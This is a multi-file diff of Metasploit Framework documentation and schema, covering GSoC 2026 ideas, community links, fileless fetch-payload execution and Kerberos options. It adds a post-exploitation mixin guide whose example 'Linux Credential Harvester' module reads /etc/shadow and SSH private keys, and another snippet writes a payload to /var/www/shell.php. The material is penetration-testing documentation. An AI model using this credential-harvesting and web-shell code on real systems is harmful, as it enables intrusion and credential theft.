+    t.index ["host_id", "port", "proto", "name", "resource"], name: "index_services_on_5_columns", unique: true
    t.index ["name"], name: "index_services_on_name"
    t.index ["port"], name: "index_services_on_port"
    t.index ["proto"], name: "index_services_on_proto"
@@ -686,6 +697,7 @@ ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
    t.integer "vuln_attempt_count", default: 0
    t.integer "origin_id"
    t.string "origin_type"
+    t.jsonb "resource", default: {}, null: false
    t.index ["name"], name: "index_vulns_on_name"
    t.index ["origin_id"], name: "index_vulns_on_origin_id"
  end
@@ -803,4 +815,7 @@ ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
    t.boolean "limit_to_network", default: false, null: false
    t.boolean "import_fingerprint", default: false
  end
+
+  add_foreign_key "service_links", "services", column: "child_id"
+  add_foreign_key "service_links", "services", column: "parent_id"
 end
@@ -57,4 +57,4 @@ override.
 ```bash
 echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
 ```
-Now you should be able get reverse shells working
+Now you should be able to get reverse shells working
@@ -1 +1 @@
-3.2.5
+3.3.8
@@ -4,6 +4,8 @@ This folder maintains the docs for https://docs.metasploit.com/ and https://gith

 ## Architecture

+This section explains how the documentation site is generated and deployed.
+
 How it works:

 - `build.rb` - The main entry point for generating the docs site from the old Github Wiki format files within `metasploit-framework.wiki/`
@@ -11,7 +13,7 @@ How it works:
 - `metasploit-framework.wiki/` - The raw markdown documentation files. Modify these files when updating the site. These files originally came from https://github.com/rapid7/metasploit-framework/wiki 
 - `metasploit-framework.wiki.old/` - A separate clone of https://github.com/rapid7/metasploit-framework/wiki

-Behind the scenes these docs are built and deployed to https://docs.metasploit.com/
+Behind the scenes, these docs are built and deployed to https://docs.metasploit.com/

 ### Adding pages

@@ -1,18 +1,38 @@
-# Chat
+# Primary Communication Channels

-A lot of our discussion happens on IRC in #metasploit on Freenode.
+## GitHub Discussions
+For community support, questions, and general discussion, visit our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions).
+
+## Slack
+Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat with the community and developers.
+
+## GitHub Issues
+Submit bug reports and feature requests through [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues).
+
+# Additional Communication Channels
+
+## Chat
+
+Some community discussion still happens on IRC in #metasploit on Freenode.
 Please be patient and hang around for a while -- not everyone is awake
 at the same time as you. =)

-# Mailing list
+## Mailing list

 The Metasploit development mailing list used to be hosted on SourceForge, but is now on Google Groups. Metasploit Hackers is dead, long live [Metasploit Hackers][list]. (Or [mailto:Metasploit Hackers][mailto]).

 The old list [is archived on seclists.org][archive].

+## Social Media
+
+- **X**: [@metasploit](https://x.com/metasploit)
+- **Mastodon**: [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit)
+- **Blog**: [Rapid7 Blog - Metasploit Tag](https://www.rapid7.com/blog/tag/metasploit/)
+- **YouTube**: [Metasploit YouTube](https://youtube.com/@MetasploitR7)
+
 # Abuse

-Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to msfdev@metasploit.com which goes to all the current committers. If the incident involves a committer, you may report directly to caitlin_condon@rapid7.com or todb@metasploit.com.
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to msfdev@metasploit.com which goes to all the current committers. If the incident involves a committer, you may report directly to smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.


 [archive]: http://seclists.org/metasploit/ "Metasploit mailing list archive"
@@ -12,8 +12,12 @@ The pgp signatures below can be verified with the following [public key](https:/

 | Download Link                                                                                                                                                |File Type| SHA                                                                                                                       | PGP                                                                                                                      |
 |--------------------------------------------------------------------------------------------------------------------------------------------------------------|-|---------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------|
-| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
-| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.9-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe)                    | Windows 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha256)               | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)                    |
+| [metasploit-4.22.9-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run)                          | Linux 64-bit | [SHA256](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha256)                 | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)                      |
+| [metasploit-4.22.8-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.8-2025102701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.8-2025102701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.8-2025102701-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.8-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.8-2025102701-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.8-2025102701-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.8-2025102701-linux-x64-installer.run.asc)   |
+| [metasploit-4.22.7-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-windows-x64-installer.exe.asc) |
+| [metasploit-4.22.7-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.7-2025061901-linux-x64-installer.run.asc)   |
 | [metasploit-4.22.6-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-windows-x64-installer.exe.asc) |
 | [metasploit-4.22.6-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run)     | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.sha1)  | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.6-2024111901-linux-x64-installer.run.asc)   |
 | [metasploit-4.22.5-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.5-2024111401-windows-x64-installer.exe.asc) |
@@ -6,4 +6,4 @@
 * [Facts and myths about antivirus evasion with Metasploit](http://schierlm.users.sourceforge.net/avevasion.html)
 * [Using metasm to avoid antivirus detection ghost writing asm](https://web.archive.org/web/20200330111926/https://www.pentestgeek.com/penetration-testing/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm)

-There are approximately 14 million other resources out there on the why's and wherefores of evading antivirus, but the about articles should get you started.
+There are approximately 14 million other resources out there on the why's and wherefores of evading antivirus, but the above articles should get you started.
@@ -0,0 +1,89 @@
+GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.
+
+Mentors: [@jheysel-r7](https://github.com/jheysel-r7)
+Co-mentors: [@zeroSteiner](https://github.com/zeroSteiner) [@h00die](https://github.com/h00die)
+
+Slack Contacts: @jheysel, @zeroSteiner and @h00die on [Metasploit Slack](https://metasploit.slack.com/)
+
+
+For any questions about these projects reach out on the Metasploit Slack in the `#gsoc` channel or DM one of the mentors
+using the Slack contacts listed above. Note that mentors may be busy so please don't expect an immediate response,
+however we will endeavor to respond as soon as possible. If you'd prefer not to join Slack, you can also email
+`msfdev [@] metasploit [dot] com` and we will respond to your questions there if email is preferable.
+
+## Enhance Metasploit Framework
+### CertificateTrace and KerberosTicketTrace Support
+
+Kerberos and certificate-based authentication mechanisms are becoming increasingly prevalent across modern environments,
+particularly in Active Directory and enterprise deployments. As a result, Metasploit modules that interact with these
+authentication flows often require operators and developers to inspect Kerberos tickets or certificate material in order
+to understand behavior, troubleshoot failures, or validate exploitation techniques. Today, this inspection typically
+requires switching to separate auxiliary modules or exporting artifacts (such as .pfx files) for analysis with external
+tooling, which interrupts the normal workflow.
+
+This project would introduce CertificateTrace and KerberosTicketTrace functionality to Metasploit, allowing relevant
+authentication artifacts to be captured and inspected as part of module execution. Similar in concept to the existing
+HttpTrace capability, these traces would focus specifically on certificate and Kerberos-based authentication, decoding
+and presenting useful metadata in a consistent, operator-friendly format. Similar to HttpTrace and HttpTraceHeadersOnly,
+we would expect there to be support for different levels of logging, ex: print only the Certificate Signing Request (CSR).
+
+
+Mentors: @jheysel-r7, @zeroSteiner
+
+Size: 175 hrs
+
+Difficulty: Medium
+
+Required Skills: Understanding of how Kerberos and certificate-based authentication work; ability to write and deliver Ruby code.
+
+Preferred Skills: Experience working with or using Kerberos and/or certificate-based authentication.
+
+
+### Automated Vulnerable Environment Provisioning (build_vuln)
+
+Many Metasploit modules—particularly those targeting web applications or open source software—include documentation
+describing how to build a vulnerable test environment, and some provide vulnerable container images to simplify this
+process. However, this information is typically maintained in module documentation and requires users to manually build
+and start the environment outside of Metasploit, making module verification more time-consuming and inconsistent.
+
+This project proposes a new Metasploit command (for example, build_vuln) that automates launching a vulnerable
+environment for a given exploit module. Vulnerable environments would be defined using Open Container Initiative
+(OCI)–compliant configurations and designed to work with both Podman and Docker, with rootless execution.
+
+The goal of this project is to automate setup steps that are already documented today, making it easier for users to
+test exploits locally and for contributors and Rapid7 engineers to verify module behavior in a repeatable,
+well-defined environment. This project would include refactoring existing modules to leverage the new functionality
+where possible (docker-compose files already exist), as well as creating new vulnerable environment definitions for
+popular modules that lack them today.
+
+
+Mentors: @jheysel-r7, @h00die
+
+Size: 360 hrs
+
+Difficulty: Medium
+
+Required Skills: Understanding of how containers work in the context of the Open Container Initiative; ability to write and deliver Ruby code.
+
+Preferred Skills: Experience using containers; understanding of container definitions and best practices.
+
+
+## Submit your own
+
+If you want to suggest your own idea, please discuss it with us first on [Slack](https://metasploit.com/slack) in the
+`#gsoc` channel to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project.
+
+## AI Usage Policy
+We understand that AI aided development seems to be the future and we have no strong opposition towards GSoC contributors using
+AI, responsibly. All code submitted for review must be both understood and tested successfully by the contributor and testing output or
+proof of working functionality must be included in the PR description.
+
+### Note on AI
+Beware that although AI can be a powerful tool, it often generates more code than is needed and has the tendency to
+rewrite library functionality that has already been implemented in the Metasploit-Framework. The best way to learn how
+to do something in Framework is to traverse the code base, study modules which follow similar exploit paths and if you
+have questions you can always ask in [Slack](https://metasploit.com/slack). At its current maturity level AI is great for helping with smaller tasks.
+For example, if you are new to writing Ruby code, ask how to parse a hash and iterate over both the keys and values,
+and it will likely be very helpful. Larger tasks, it will struggle with. For example, if you ask “I would like you to
+write a Metasploit module for this CVE / PoC” it will generate lots of code (aka slop) that will not run. PRs submitted
+that do not work and have clearly been AI generated will not be reviewed and repeated offenders will have disciplinary action applied.
@@ -110,7 +110,7 @@ end

    * **Stability** - The Stability field describes how the exploit affects the system it's being run on, ex: `CRASH_SAFE`, `CRASH_OS_DOWN`
    * **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
-    * **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.
+    * **SideEffects** - The SideEffects field describes the side effects caused by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.

 ### Non-required fields

@@ -2,21 +2,18 @@

 Before submitting to the GSoC website, it is also helpful to solicit proposal feedback. This can be done by reaching out to us on our Slack at <https://metasploit.com/slack> via the `#gsoc` channel, or via sending an email to `msfdev [@] metasploit [dot]  com`. If you don't hear back right away on a proposal, don't give up! Contributors may be busy, or you may need to try again to get someone's attention (but don't spam).

-# 2022 Timeline
+# 2026 Timeline
 An updated list of the application timeline can be found at https://developers.google.com/open-source/gsoc/timeline. Please refer to this link for any updates that Google may make, as they have been known to change the timeline for certain dates in the past.

 ## Important Dates

- GSoC Applications Open: April 4th at 1800 UTC
- GSoC Applications Close: April 19th at 1800 UTC for 2022 GSoC applications. **No late submissions will be accepted, period.**
- Accepted applications announced: May 20th at 1800 UTC
- Programming Starts: June 13th.
+- GSoC Applications Open: March 16th at 18:00 UTC
+- GSoC Applications Close: March 31th at 1800 UTC for 2026 GSoC applications
+- Accepted GSoC contributor projects announced: April 30th at 1800 UTC
+- Programming Starts: May 25th.

-## Important Changes for 2022
- All submissions (including both draft submissions and final submissions) must be in PDF format when being submitted to GSoC's website. If you would like us to review your submission prior to the final deadline, please submit a Google Drive link to your DOC formatted proposal to msfdev [AT] metasploit [DOT] com and make sure that you have enabled commenting so that potential mentors can provide feedback.
-
-# 2022 Idea List
-You can find the current list of GSoC ideas at [[GSoC-2022-Project-Ideas]]. Please see the note at the bottom of this page if you are interested in submitting your own idea, as this will require approval.
+# 2026 Idea List
+You can find the current list of GSoC ideas at [[GSoC-2026-Project-Ideas]]. Please see the note at the bottom of this page if you are interested in submitting your own idea, as this will require approval.

 # Getting started
 Students interesting in GSoC, can start by reading Google's official guides.
@@ -41,7 +41,7 @@ include Msf::Auxiliary::Scanner

 A couple of new things will be added to your module when you include this mixin. You will have a new datastore option named "RHOSTS", which allows the user to specify multiple hosts. There's a new "THREADS" option, which allows the number of threads to run during execution. There's also "ShowProgress" and "ShowProgressPercent" for tracking scan progress.

-Typically, the main method for an auxiliary module is "def run". But when you use the ```Msf::Auxiliary::Scanenr``` mixin, you need to be using ```def run_host(ip)```. The IP parameter is the target machine.
+Typically, the main method for an auxiliary module is "def run". But when you use the ```Msf::Auxiliary::Scanner``` mixin, you need to be using ```def run_host(ip)```. The IP parameter is the target machine.

 ## Templates

@@ -81,7 +81,7 @@ served payload is the same.
 ### Dependent Options
 `FETCH_FILELESS` is an option that specifies a method to modify the fetch command to download the binary payload to
 memory rather than disk before execution, thus avoiding some HIDS and making forensics harder.  Currently, there are
-two options: `bash` and `python3.8+`.  Both of these require the target to be running Linux Kernel 3.17 or above.
+two options: `shell`, `shell-search` and `python3.8+`. All of these require the target to be running Linux Kernel 3.17 or above.
 This option is only available when the platform is Linux.

 `FETCH_FILENAME` is the name you'd like the executable payload saved as on the remote host.  This option is not
@@ -104,6 +104,16 @@ The remaining options will be the options available to you in the served payload
 `linux/x64/meterpreter/reverse_tcp` so our only added options are `LHOST` and `LPORT`.  If we had selected a different
 payload, we would see different options.

+### Fileless Execution
+
+For Linux payloads, we support **fileless ELF execution** - this option is enabled with `FETCH_FILELESS`. Currently, this option can be the following values: `python3.8+`, `shell-search`, and `shell`. The basic idea behind all of them is the same: execute the payload from an anonymous file handle, which should never touch a disk, thereby adding a layer of stealth. 
+
+The `shell-search` option searches for available anonymous file handles available on the system, copies the payload into the one it finds, and executes the payload from that handle. This method uses `POSIX` commands only so that it can be run in any shell. 
+
+The `shell` option uses a slightly different approach: it runs the assembly stub from a shell, creates an anonymous file handle inside of the shell process, copies the payload into a new handle, and then runs it. Finally, it will kill the original shell process, leaving the payload running as *orphan* process. This method uses a syscall `memfd_create` to create an anonymous file handle. 
+This option can be used in any Linux shell. 
+
+The `python3.8+` option uses the same technique as the `shell` option. However, it all happens in Python code. It will call the `os.memfd_create` function, which will create an anonymous file handle from the Python process. Then, it uses `os.system` to copy the payload into a new file handle and execute it. This option requires Python version 3.8 or higher on the target machine.
 ### Generating the Fetch Payload
 ```msf
 msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_COMMAND WGET
@@ -18,6 +18,7 @@ US-CERT-VU | kb.cert.org | ```['US-CERT-VU', '800113']```
 ZDI | zerodayinitiative.com | ```['ZDI', '10-123']```
 WPVDB | wpvulndb.com | ```['WPVDB', '7615']```
 PACKETSTORM | packetstormsecurity.com | ```['PACKETSTORM', '132721']```
+GHSA | github.com/advisories or github.com/owner/repo/security/advisories | ```['GHSA', 'xxxx-xxxx-xxxx']``` or ```['GHSA', 'xxxx-xxxx-xxxx', 'owner/repo']```
 URL | anything | ```['URL', 'http://example.com/blog.php?id=123']```
 AKA (_deprecated_*) | anything | ~~`['AKA', 'shellshock']`~~

@@ -0,0 +1,192 @@
+# Post Exploitation Mixins
+
+Post exploitation mixins provide a consistent API for interacting with compromised systems across different session types (Meterpreter, shell, PowerShell). Located in `lib/msf/core/post/`, these mixins abstract platform and session type differences.
+
+## Msf::Post::Common
+
+Core utilities for command execution and session interaction.
+
+```ruby
+include Msf::Post::Common
+
+# Modern API - use create_process for commands with arguments
+output = create_process('grep', args: ['-r', pattern, '/var/log'], time_out: 30, opts: { 'Hidden' => true })
+
+# Legacy API - cmd_exec only for static command strings
+hostname = cmd_exec('hostname')
+
+# Environment variables
+env_vars = get_envs('HOME', 'USER', 'PATH')  # Returns hash of env vars
+home = get_env('HOME')                        # Single variable
+
+# Check command availability
+if command_exists?('python3')
+  version = create_process('python3', args: ['--version'])
+end
+
+# Session information
+target = "#{rhost}:#{rport}"  # Or use: peer
+```
+
+## Msf::Post::File
+
+Cross-platform file system operations.
+
+```ruby
+include Msf::Post::File
+
+# Navigation and listing
+current = pwd
+cd('/tmp')
+files = dir('/etc')  # or ls('/etc')
+
+# File checks
+if file?('/etc/passwd') && readable?('/etc/passwd')
+  content = read_file('/etc/passwd')
+  store_loot('passwd', 'text/plain', session, content)
+end
+
+if directory?('/var/www') && writable?('/var/www')
+  write_file('/var/www/shell.php', payload)
+end
+
+# File operations
+mkdir('/tmp/staging')              # Auto-registered for cleanup
+data = read_file('/etc/shadow')
+write_file('/tmp/output.txt', data)
+hash = file_remote_digestmd5('/bin/bash')
+
+# Path expansion
+expanded = expand_path('$HOME/.ssh/id_rsa')  # Unix
+expanded = expand_path('%APPDATA%\\data')     # Windows
+```
+
+## Msf::Post::Process
+
+Process enumeration and manipulation.
+
+```ruby
+include Msf::Post::Process
+
+# Enumerate processes
+processes = get_processes
+processes.each { |p| print_line("#{p['pid']}: #{p['name']}") }
+
+# Find specific processes
+nginx_pids = pidof('nginx')
+if nginx_pids.any?
+  print_good("Found nginx: #{nginx_pids.join(', ')}")
+  nginx_pids.each { |pid| kill_process(pid) }
+end
+
+# Check process existence
+if has_pid?(1234)
+  print_good("Process 1234 is running")
+end
+```
+
+## Msf::Post::Unix
+
+Unix/Linux-specific utilities.
+
+```ruby
+include Msf::Post::Unix
+
+# Privilege checking
+if is_root?
+  print_good("Running as root")
+else
+  print_warning("Running as #{whoami}")
+end
+
+# User enumeration
+users = get_users
+users.each do |u|
+  print_line("#{u['name']} (UID: #{u['uid']}, Shell: #{u['shell']})")
+end
+admin_users = users.select { |u| u['uid'].to_i == 0 }
+
+# Group enumeration
+groups = get_groups
+sudo_group = groups.find { |g| g['name'] =~ /sudo|wheel/ }
+print_good("Sudo users: #{sudo_group['users']}") if sudo_group
+
+# Find SSH keys and interesting files
+ssh_keys = enum_user_directories
+ssh_keys.each do |key|
+  content = read_file(key)
+  store_loot('ssh.key', 'text/plain', session, content, key)
+end
+```
+
+## Platform-Specific Mixins
+
+### Msf::Post::Windows
+Windows-specific operations including registry manipulation, service management, and Windows API access. See Windows-specific documentation.
+
+### Msf::Post::Linux
+Linux-specific system information gathering and kernel utilities.
+
+### Msf::Post::OSX
+macOS-specific utilities and system interaction methods.
+
+### Msf::Post::Android
+Android device interaction and data collection methods.
+
+### Msf::Post::Hardware
+Hardware interaction utilities (e.g., USB devices, serial ports).
+
+## Example Module
+
+```ruby
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Linux Credential Harvester',
+      'Description' => 'Collects credentials from Linux system',
+      'License' => MSF_LICENSE,
+      'Author' => ['Your Name'],
+      'Platform' => ['linux'],
+      'SessionTypes' => ['meterpreter', 'shell']
+    ))
+  end
+
+  def run
+    print_status("Harvesting credentials on #{peer}")
+    
+    if is_root?
+      # Root access - collect shadow file
+      if readable?('/etc/shadow')
+        shadow = read_file('/etc/shadow')
+        store_loot('shadow', 'text/plain', session, shadow, '/etc/shadow')
+      end
+    end
+    
+    # Collect SSH keys
+    ssh_keys = enum_user_directories
+    ssh_keys.each do |key_path|
+      key = read_file(key_path)
+      store_loot('ssh.key', 'text/plain', session, key, key_path)
+    end
+    
+    # Check for interesting processes
+    if pidof('sshd').any?
+      print_good("SSH daemon running")
+    end
+  end
+end
+```
+
+## Best Practices
+
+- **Use `create_process`** for commands with arguments: `create_process('ls', args: ['-la', path])`
+- **Use `cmd_exec`** only for static strings: `cmd_exec('hostname')`
+- **Check before acting**: Use `file?()`, `readable?()`, `writable?()` before file operations
+- **Handle errors**: Wrap operations in `begin/rescue` blocks
+- **Register cleanup**: Files created with `write_file()` are auto-registered; use `register_file_for_cleanup()` for others
+- **Store loot properly**: Use `store_loot()` to save collected data
+- **Check session type**: Some operations behave differently on Meterpreter vs shell sessions
+
@@ -1580,7 +1580,7 @@ msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhost=172.16.199.200 cert_f
 [*] Auxiliary module execution completed
 ```

-#### ESC16 Scenario 2
+## ESC16 Scenario 2
 If domain controllers are in Full Enforcement mode (`StrongCertificateBindingEnforcement` == 2), ESC16 alone would normally
 prevent authentication using certificates that lack the required SID extension. However, if the CA is also vulnerable
 to ESC6, which is defined as: `EDITF_ATTRIBUTESUBJECTALTNAME2` flag is set under it's `EditFlags` registry key, located here:
@@ -142,7 +142,8 @@ Optional options:
    * `read-only` -- Stored tickets from the cache will be used, but no new tickets are stored.
    * `write-only` -- New tickets are requested and they are stored for reuse.
    * `read-write` -- Stored tickets from the cache will be used and new tickets will be stored for reuse.
-* `${Prefix}KrbOfferedEncryptionTypes' -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`
+* `KrbClockSkew` -- Adjust Kerberos timestamps by the given offset when talking to the KDC. Supports `s`, `m`, `h`, and `d` units and accepts negatives, e.g. `-5m` or `120s`.
+* `${Prefix}KrbOfferedEncryptionTypes` -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`

 ## Ticket management

@@ -597,6 +597,10 @@ NAVIGATION_CONFIG = [
                  },
                ]
              },
+              {
+                path: 'Post-Mixins.md',
+                title: 'PostMixins'
+              },
              {
                path: 'How-to-log-in-Metasploit.md',
                title: 'Logging'
@@ -907,6 +911,10 @@ NAVIGATION_CONFIG = [
            path: 'GSoC-2023-Project-Ideas.md',
            title: without_prefix('GSoC')
          },
+          {
+            path: 'GSoC-2026-Project-Ideas.md',
+            title: without_prefix('GSoC')
+          },
        ]
      },
      {
@@ -54,9 +54,9 @@ retrieve deployment packages from S3.
 The VPC or Virtual Private Cloud, an isolated local area network. Network access
 can be made available by assigning an Internet routable IP address to a host or
 routing traffic to it through an ELB (Elastic Load Balancer). In either case
-security-groups are used to open access to network ranges and specific TPC/UDP
+security-groups are used to open access to network ranges and specific TCP/UDP
 ports. Security-groups provide much of the functionality of traditional firewalls
-and can be configured by specifying a protocol, a CIDR and a port. 
+and can be configured by specifying a protocol, a CIDR and a port.

 ## How it Works

@@ -65,7 +65,7 @@ Web console or the CLI, launching a host in the Cloud requires a fair
 amount of configuration; this module does its best to abstract configuration
 requirements away from the user by auto detecting the VPC, subnets, creating
 security groups, etc. It performs several tasks to launch a host with
-a public IP address, these are as follow: 1) select a VPC, 2) select a subnet, 3)
+a public IP address, these are as follows: 1) select a VPC, 2) select a subnet, 3)
 create/select a security group, 4) create/select a key-pair, and 5) launch
 a host.

@@ -80,7 +80,7 @@ an Internet routable IP address. The module dynamically finds which subnet to
 launch the host in. It will use the first subnet it finds having the
 `Auto-assign Public IP` option set, if no such subnet exists, then it will
 select the first subnet having an Internet gateway. To circumvent this process,
-the `SUBNET_ID` advanced option can be set. 
+the `SUBNET_ID` advanced option can be set.

 When launching a Cloud host at least one security group is required. There are
 several advanced options for creating/selecting a security group. The
@@ -88,7 +88,7 @@ several advanced options for creating/selecting a security group. The
 That is, the module will create a security group unless the `SEC_GROUP_ID`
 options is set. If the `SEC_GROUP_ID` option is not set, the module will attempt
 to create a security group using the values specified in the `SEC_GROUP_CIDR`,
-`SEC_GROUP_NAME`, and `SEC_GROUP_PORT` options as configuration. 
+`SEC_GROUP_NAME`, and `SEC_GROUP_PORT` options as configuration.

 The `KEY_NAME` and `SSH_PUB_KEY` options are used in conjunction to select or
 create a key-pair (a named SSH public key). Key-pairs are used to authenticate
@@ -113,7 +113,7 @@ use command. To run the module, only the `AccessKeyId`, `SecretAccessKey`, and
 Basic Options:

 * `AMI_ID`: The Amazon Machine Image (AMI) ID (region dependent)
-* `RHOST`: the AWS EC2 Endpoint (ec2.us-west-2.amazonaws.com), may change this to something closer to you
+* `RHOST`: The AWS EC2 Endpoint (ec2.us-west-2.amazonaws.com), may change this to something closer to you
 * `Region`: The default region (us-west-2), must match endpoint
 * `AccessKeyId`: AWS API access key
 * `SecretAccessKey`: AWS API secret access key
@@ -129,10 +129,10 @@ Advanced Options:
 * `MinCount`: Minimum number of instances to launch
 * `ROLE_NAME`: The instance profile/role name
 * `RPORT:` AWS EC2 Endpoint TCP Port
-* `SEC_GROUP_ID`: the EC2 security group to use
-* `SEC_GROUP_CIDR`: the EC2 security group network access CIDR, defaults to 0.0.0.0/0
-* `SEC_GROUP_NAME`: the EC2 security group name
-* `SEC_GROUP_PORT`: the EC2 security group network access port, defaults to tcp:22
+* `SEC_GROUP_ID`: The EC2 security group to use
+* `SEC_GROUP_CIDR`: The EC2 security group network access CIDR, defaults to 0.0.0.0/0
+* `SEC_GROUP_NAME`: The EC2 security group name
+* `SEC_GROUP_PORT`: The EC2 security group network access port, defaults to tcp:22
 * `SUBNET_ID`: The public subnet to use
 * `UserAgent`: The User-Agent header to use for all requests
 * `VPC_ID`: The EC2 VPC ID
@@ -181,7 +181,7 @@ msf auxiliary(aws_launch_instances) > run
 ...
 [*] instance i-12345678 status: ok
 [*] Instance i-12345678 has IP address 54.186.158.6
-[*] Auxiliary module execution completed 
+[*] Auxiliary module execution completed
 ```

 When the host has passed its primary system checks, the IP address will be
@@ -12,7 +12,7 @@ Only the deprecated DIAL protocol is supported by this module. Casting via the n

 ## Options

-  **VID**
+### VID

  The YouTube video to be played.  Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)

@@ -36,6 +36,9 @@ The certificate template to issue, e.g., "User".
 ### TARGET_USERNAME
 The username of the target account whose LDAP object will be updated and for whom the certificate will be requested.

+### TARGET_PASSWORD
+The password of the target username. Not required. The module will use Shadow Credentials to authenticate as the target user if this is left blank.
+
 ### UPDATE_LDAP_OBJECT
 The LDAP attribute to update, such as `userPrincipalName` or `dNSHostName`.

@@ -135,6 +138,72 @@ msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
 [*] Auxiliary module execution completed
 ```

+### ESC9 - Update userPrincipalName when you already have `TARGET_PASSWORD`. See shadow credentials don't get created / used
+```
+msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options
+
+Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):
+
+   Name                      Current Setting    Required  Description
+   ----                      ---------------    --------  -----------
+   ADD_CERT_APP_POLICY                          no        Add certificate application policy OIDs
+   ALT_DNS                                      no        Alternative certificate DNS
+   ALT_SID                                      no        Alternative object SID
+   ALT_UPN                                      no        Alternative certificate UPN (format: USER@DOMAIN)
+   CA                        kerberos-DC2-CA    yes       The target certificate authority
+   CERT_TEMPLATE             User               yes       The certificate template
+   LDAPDomain                kerberos.issue     yes       The domain to authenticate to
+   LDAPPassword              N0tpassword!       yes       The password to authenticate with
+   LDAPUsername              user1              yes       The username to authenticate with, who must have permissions to update the TARGET_USERNAME
+   SSL                       false              no        Enable SSL on the LDAP connection
